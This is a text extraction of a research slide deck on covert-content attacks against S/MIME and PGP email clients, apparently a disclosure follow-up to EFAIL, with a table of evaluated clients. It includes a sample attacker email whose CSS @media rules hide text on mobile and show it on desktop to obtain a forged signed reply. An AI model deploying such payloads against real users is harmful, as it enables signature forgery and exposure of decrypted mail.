4. • Last year: EFAIL
– Major attack with a logo
Remember EFAIL?
2
5. • Last year: EFAIL
– Major attack with a logo
– Novel attack techniques
targeting S/MIME + PGP
Remember EFAIL?
2
6. • Last year: EFAIL
– Major attack with a logo
– Novel attack techniques
targeting S/MIME + PGP
• Today: non-crypto attacks
Remember EFAIL?
2
7. • Last year: EFAIL
– Major attack with a logo
– Novel attack techniques
targeting S/MIME + PGP
• Today: non-crypto attacks
– Targeting encryption and digital signatures
Remember EFAIL?
2
12. I. “Strong crypto is virtually unbreakable.”
II. “Digital signature will prevail. Math wins.”
Technology's promise
4
13. I. “Strong crypto is virtually unbreakable.”
II. “Digital signature will prevail. Math wins.”
Technology's promise
…claims I. and II. could be bypassed with
a single reply to a benign looking email?
What if…
4
21. Content-type: text/plain
Some ASCII text message…
Content-type: text/plain
This is the 2nd part
From: alice@good.com
To: johnny@good.com
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Multipart MIME email
7
22. Content-type: text/plain
Some ASCII text message…
Content-type: text/plain
This is the 2nd part
From: alice@good.com
To: johnny@good.com
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Multipart MIME email
7
23. Content-type: text/plain
Some ASCII text message…
Content-type: text/plain
This is the 2nd part
From: alice@good.com
To: johnny@good.com
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Multipart MIME email
7
24. Content-type: text/plain
Some ASCII text message…
Content-type: text/plain
This is the 2nd part
From: alice@good.com
To: johnny@good.com
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Multipart MIME email
7
25. Content-type: text/plain
Some ASCII text message…
Content-type: text/plain
This is the 2nd part
From: alice@good.com
To: johnny@good.com
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Multipart MIME email
multipart/mixed
7
26. Content-type: text/plain
Some ASCII text message…
Content-type: text/plain
This is the 2nd part
From: alice@good.com
To: johnny@good.com
Content-type: multipart/mixed; boundary="XXX"
--XXX
--XXX
--XXX--
Multipart MIME email
multipart/mixed
texttext
7
36. • Eve has captured ciphertext
Attacker model
11
37. • Eve has captured ciphertext
• Can modify email structure
Attacker model
11
38. • Eve has captured ciphertext
• Can modify email structure
• Can re-send it to the victim
Attacker model
11
39. • Eve has captured ciphertext
• Can modify email structure
• Can re-send it to the victim
– Either to recipient or sender
Attacker model
11
40. • Eve has captured ciphertext
• Can modify email structure
• Can re-send it to the victim
– Either to recipient or sender
– Both can decrypt the email
Attacker model
11
71. Signature oracle
From: eve@evil.com
To: johnny@good.com
Content-type: text/html
<style>
IF condition:
Hide * but show .covert
</style>
What's up Johnny?
<div class="covert">I hereby declare war.</div>
16
72. Signature oracle
From: eve@evil.com
To: johnny@good.com
Content-type: text/html
<style>
@media (max-device-width: 834px) {
.covert {visibility: hidden;}}
</style>
What's up Johnny?
<div class="covert">I hereby declare war.</div>
hide covert
content on
mobile devices
16
73. Signature oracle
From: eve@evil.com
To: johnny@good.com
Content-type: text/html
<style>
@media (max-device-width: 834px) {
.covert {visibility: hidden;}}
@media (min-device-width: 835px) {
* {visibility: hidden;}
.covert {visibility: visible}}
</style>
What's up Johnny?
<div class="covert">I hereby declare war.</div>
but show on
desktop devices
16
74. I'm fine, thanks.
On 01/05/19 09:53, Eve wrote:
> What's up Johnny?
Re: What's up Johnny?
17
75. I'm fine, thanks.
On 01/05/19 09:53, Eve wrote:
> What's up Johnny?
Re: What's up Johnny?
Reply email sent from
Johnny’s mobile phone
17
76. I'm fine, thanks.
On 01/05/19 09:53, Eve wrote:
> What's up Johnny?
Re: What's up Johnny?
Reply email sent from
Johnny’s mobile phone
17
77. I'm fine, thanks.
On 01/05/19 09:53, Eve wrote:
> What's up Johnny?
Re: What's up Johnny?
I hereby declare war.
Signed email received
on a desktop device
Reply email sent from
Johnny’s mobile phone
17
81. • Targeting device type (@media)
• Targeting email client (@supports)
• Targeting user account (@document)
Conditional rules
18
82. • Targeting device type (@media)
• Targeting email client (@supports)
• Targeting user account (@document)
Conditional rules
18
83. 1. Introduction
2. Attacks on Encryption
3. Attacks on Signatures
4. Evaluation
5. Mitigation
Overview
19
84. 1. Introduction
2. Attacks on Encryption
3. Attacks on Signatures
4. Evaluation
5. Mitigation
Overview
19
85. OS Client
Decryption Signatures
S/MIME PGP S/MIME PGP
Windows
Thunderbird
Outlook
Win. 10 Mail
Win Live Mail
The Bat!
Postbox
eM Client
Linux
KMail
Evolution
Trojitá
Claws
Mutt
macOS
Apple Mail
MailMate
Airmail
iOS Mail App
Android
K-9 Mail
R2Mail2
MailDroid
Nine
Web
Exchange/OWA
Roundcube
Horde/IMP
Mailpile
● Plaintext can be completely hidden
◐ Plaintext merged with attacker-text
○ No vulnerabilities found
– Cryptosystem not available
Decryption oracles
● Covert rules kept in reply message
◐ Covert rules only for received mail
Signature oracles
20
86. OS Client
Decryption Signatures
S/MIME PGP S/MIME PGP
Windows
Thunderbird ●
Outlook ○
Win. 10 Mail ○
Win Live Mail ○
The Bat! ○
Postbox ●
eM Client ○
Linux
KMail ◐
Evolution ◐
Trojitá ◐
Claws ◐
Mutt ◐
macOS
Apple Mail ●
MailMate ●
Airmail ●
iOS Mail App ●
Android
K-9 Mail –
R2Mail2 ○
MailDroid ○
Nine ○
Web
Exchange/OWA ○
Roundcube –
Horde/IMP ○
Mailpile –
● Plaintext can be completely hidden
◐ Plaintext merged with attacker-text
○ No vulnerabilities found
– Cryptosystem not available
Decryption oracles
● Covert rules kept in reply message
◐ Covert rules only for received mail
Signature oracles
20
87. OS Client
Decryption Signatures
S/MIME PGP S/MIME PGP
Windows
Thunderbird ● ●
Outlook ○ ○
Win. 10 Mail ○ –
Win Live Mail ○ –
The Bat! ○ ○
Postbox ● ●
eM Client ○ ○
Linux
KMail ◐ ◐
Evolution ◐ ◐
Trojitá ◐ ◐
Claws ◐ ◐
Mutt ◐ ◐
macOS
Apple Mail ● ●
MailMate ● ●
Airmail ● ●
iOS Mail App ● –
Android
K-9 Mail – ○
R2Mail2 ○ ●
MailDroid ○ ○
Nine ○ –
Web
Exchange/OWA ○ –
Roundcube – ◐
Horde/IMP ○ ○
Mailpile – ○
● Plaintext can be completely hidden
◐ Plaintext merged with attacker-text
○ No vulnerabilities found
– Cryptosystem not available
Decryption oracles
● Covert rules kept in reply message
◐ Covert rules only for received mail
Signature oracles
20
88. OS Client
Decryption Signatures
S/MIME PGP S/MIME PGP
Windows
Thunderbird ● ● ●
Outlook ○ ○ ◐
Win. 10 Mail ○ – ◐
Win Live Mail ○ – ●
The Bat! ○ ○ ○
Postbox ● ● ●
eM Client ○ ○ ◐
Linux
KMail ◐ ◐ ○
Evolution ◐ ◐ ◐
Trojitá ◐ ◐ ◐
Claws ◐ ◐ ○
Mutt ◐ ◐ ○
macOS
Apple Mail ● ● ◐
MailMate ● ● ●
Airmail ● ● ●
iOS Mail App ● – ●
Android
K-9 Mail – ○ –
R2Mail2 ○ ● ◐
MailDroid ○ ○ ●
Nine ○ – ●
Web
Exchange/OWA ○ – ●
Roundcube – ◐ ◐
Horde/IMP ○ ○ ◐
Mailpile – ○ –
● Plaintext can be completely hidden
◐ Plaintext merged with attacker-text
○ No vulnerabilities found
– Cryptosystem not available
Decryption oracles
● Covert rules kept in reply message
◐ Covert rules only for received mail
Signature oracles
20
89. OS Client
Decryption Signatures
S/MIME PGP S/MIME PGP
Windows
Thunderbird ● ● ● ●
Outlook ○ ○ ◐ ◐
Win. 10 Mail ○ – ◐ –
Win Live Mail ○ – ● –
The Bat! ○ ○ ○ ○
Postbox ● ● ● ●
eM Client ○ ○ ◐ ◐
Linux
KMail ◐ ◐ ○ ○
Evolution ◐ ◐ ◐ ◐
Trojitá ◐ ◐ ◐ ◐
Claws ◐ ◐ ○ ○
Mutt ◐ ◐ ○ ○
macOS
Apple Mail ● ● ◐ ◐
MailMate ● ● ● ●
Airmail ● ● ● ●
iOS Mail App ● – ● –
Android
K-9 Mail – ○ – ●
R2Mail2 ○ ● ◐ ◐
MailDroid ○ ○ ● ●
Nine ○ – ● –
Web
Exchange/OWA ○ – ● –
Roundcube – ◐ ◐ ◐
Horde/IMP ○ ○ ◐ ◐
Mailpile – ○ – ○
● Plaintext can be completely hidden
◐ Plaintext merged with attacker-text
○ No vulnerabilities found
– Cryptosystem not available
Decryption oracles
● Covert rules kept in reply message
◐ Covert rules only for received mail
Signature oracles
20
90. OS Client
Decryption Signatures
S/MIME PGP S/MIME PGP
Windows
Thunderbird ● ● ● ●
Outlook ○ ○ ◐ ◐
Win. 10 Mail ○ – ◐ –
Win Live Mail ○ – ● –
The Bat! ○ ○ ○ ○
Postbox ● ● ● ●
eM Client ○ ○ ◐ ◐
Linux
KMail ◐ ◐ ○ ○
Evolution ◐ ◐ ◐ ◐
Trojitá ◐ ◐ ◐ ◐
Claws ◐ ◐ ○ ○
Mutt ◐ ◐ ○ ○
macOS
Apple Mail ● ● ◐ ◐
MailMate ● ● ● ●
Airmail ● ● ● ●
iOS Mail App ● – ● –
Android
K-9 Mail – ○ – ●
R2Mail2 ○ ● ◐ ◐
MailDroid ○ ○ ● ●
Nine ○ – ● –
Web
Exchange/OWA ○ – ● –
Roundcube – ◐ ◐ ◐
Horde/IMP ○ ○ ◐ ◐
Mailpile – ○ – ○
● Plaintext can be completely hidden
◐ Plaintext merged with attacker-text
○ No vulnerabilities found
– Cryptosystem not available
Decryption oracles
● Covert rules kept in reply message
◐ Covert rules only for received mail
Signature oracles
20
91. 1. Introduction
2. Attacks on Encryption
3. Attacks on Signatures
4. Evaluation
5. Mitigation
Overview
21
92. 1. Introduction
2. Attacks on Encryption
3. Attacks on Signatures
4. Evaluation
5. Mitigation
Overview
21
108. • Crypto is not enough, bypasses exist
Conclusion
24
109. • Crypto is not enough, bypasses exist
• 22 of 24 tested clients are vulnerable
Conclusion
24
110. • Crypto is not enough, bypasses exist
• 22 of 24 tested clients are vulnerable
• Building security on top of email is hard
Conclusion
24
111. • Crypto is not enough, bypasses exist
• 22 of 24 tested clients are vulnerable
• Building security on top of email is hard
Conclusion
Thank you! Questions?
Exploits: github.com/RUB-NDS/Covert-Content-Attacks
24